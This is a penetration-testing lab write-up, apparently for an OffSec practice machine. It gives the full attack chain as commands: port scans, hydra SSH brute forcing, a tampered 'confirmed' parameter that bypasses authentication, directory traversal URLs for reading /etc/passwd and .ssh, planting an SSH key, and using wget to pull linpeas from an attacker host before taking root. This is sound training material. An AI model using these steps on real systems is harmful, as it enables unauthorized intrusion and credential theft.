Summary: This box by Offsec does a great job at using specific web enumeration techniques to unravel how a security misconfiguration in a client supplied field can allow for authentication bypass and ultimately system compromise.
NMAP
[+] As always, I start with my broad/general scan and then get detailed scans based on my open ports. I always use rustscan to verify nmap didn’t drop any ports on my initial scan.
nmap -p- -T4 $ip
rustscan -a $ip --ulimit 5000
nmap -A -T4 -p 22,80,33017 $ip -oN nmap.fulltcp
Port Enumeration
[+] Test default/common creds against ssh using hydra.
hydra -C ssh-betterdefaultpasslist.txt ssh://192.168.198.231 -t 4 -v
Unsuccessful
Web Enumeration
[+] Port 80 always looks promising but let’s check the output of port 33017 that we saw is open to us.
curl http://192.168.198.231:33017
Nothing interesting here. If I get stuck, I’ll enumerate this further.
[+] Port 80 drops us right into a login page which we love to see, however I want to do some directory busting before moving onto testing for default creds or trying to identify if there are any exploits/misconfigurations to bypass the authentication logic.
gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30
[+] It doesn’t seem like we can leverage weak credentials on the login page. Checking our gobuster results, we have a register directory. After registering a fake account and using burp suite to investigate the request and response from the client/server; We identify some parameters the server responds with that we can modify and hopefully “trick” the server to bypass authentication. In the image below, the response from the server outputs a Boolean statement of “confirmed:false”. Let’s modify this to a “true” statement and see what happens.
The original request/response that will be modified.
_method=patch&authenticity_token=Oksow9P0rdRvQYgMcyJ09EUkp-va8TyB213OukKdObu9Ib8WuOTFU1LwP2uJ617hZvM04RcCQcdpBGDNNftngg&user%5Bconfirmed%5D=True&user%5Bemail%5D=PleaseLike%40test.com&commit=Change%20email
Sweet! We’re in.
Exploitation
[+] That redirection for filemanager directory that we picked up from gobuster seems to be where we landed. My inclination is that we should be able to abuse the file upload feature to RCE somehow. Let’s upload a test file and then a webshell.
Nice, so we probably have a unrestricted file upload vulnerability. Let’s select our file and identify where the server is storing our file. This is crucial so that we are able to trigger our webshell once its uploaded.
[+] We get something interesting parameters in the URL path. First, the cwd most likely means the “current working directory”, however, it’s left blank. Filemanager must be set as the default or preconfigured base directory since we know our file was dropped in that directory. The “file” parameter actually invokes our file we are specifying. Let’s try directory traversal by navigating to /etc/passwd which will output users on the system.
http://192.168.198.231/?cwd=../../../../../../etc&file=passwd&download=true
Awesome, our downloaded file contains the contents of the /etc/passwd file. We also find a user remi.
[+] Let’s apply the same process again but to traverse to the user remi’s .ssh folder.
http://192.168.198.231/?cwd=../../../../../../home/remi/&file=.ssh&download=true
we have access to the .ssh folder
[+] There is no “authorized_keys” file. We can generate our own keys, upload it to the .ssh folder and then use the private key to gain access.
ssh-keygen -q -N '' -f sshkey
mv sshkey.pub authorized_keys
chmod 600 sshkey
ssh -i sshkey remi@192.168.198.231
Privilege Escalation
[+] Remi does not have any sudo permissions, in any special groups, and no SUID binaries showed any promise. Kernal version is not exploitable. It’s time to start some automated scans while I work on my manual enumeration methodology on this machine. Linpeas is the first automated scan I like to use, but I need to transfer it to the system first.
# kali
cp /root/transfer linpeas.sh . # my transfer file has binaries I like to drop in every machine I get access too
server 80 # server is my alias for a python http.server to host/transfer files from
# target
which wget #need to identify what LOL binary is accessible on the system
wget http://192.168.45.190/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Linpeas got a hit for a root ssh private key. If we do have access to the root private key, we’ll easily be able to escalate.
[+] Let’s see if we can access the private key in remi’s .ssh directory.
[+] SSH into root with the root private key.
ssh -i root root@127.0.0.1
Pwn3d!